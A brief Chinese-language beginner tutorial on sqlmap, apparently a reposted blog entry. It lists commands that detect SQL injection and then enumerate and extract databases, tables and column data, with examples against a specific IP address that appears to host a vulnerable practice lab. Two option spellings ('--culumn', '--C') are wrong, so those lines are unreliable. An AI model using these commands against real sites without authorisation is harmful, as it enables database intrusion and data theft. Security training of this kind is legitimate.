sqlmap 基本使用方法(初级版)

sqlmap是一个很好的sql注入工具,操作简单,容易上手

sqlmap -u url                               //查看目标url是否存在sql注入漏洞
sqlmap -u url --dbs                                     //如果存在,爆破数据库
sqlmap -u url -D 数据库名 --tables                         //爆破表名
sqlmap -u url -D 数据库名 -T 表名 --culumn                        //爆破列名
sqlmap -u url -D 数据库名 -T 表名 --C 列名1,列名2                    //查询信息

命令说明

sqlmap  -u  目标url

当使用-u参数时,有前提条件。网页必须是get请求,初学者可理解为 网页后面有个问号

例如此url:http://45.32.81.200/vul/sqli/sqli_str.php

此url尾部无问号,因此不能用 -u 参数

但是,如果此时url为 http://45.32.81.200/vul/sqli/sqli_str.php?name=1   就可以使用了

特别注意       当url的问号后面有两个参数,需在url加双引号 

例如此url  http://45.32.81.200/vul/sqli/sqli_str.php?name=1&sex=2

就该这样使用:                 sqlmap -u "目标url"

 sqlmap -u "http://45.32.81.200/vul/sqli/sqli_str.php?name=1&sex=2"

你可能感兴趣的:(sqlmap 基本使用方法(初级版))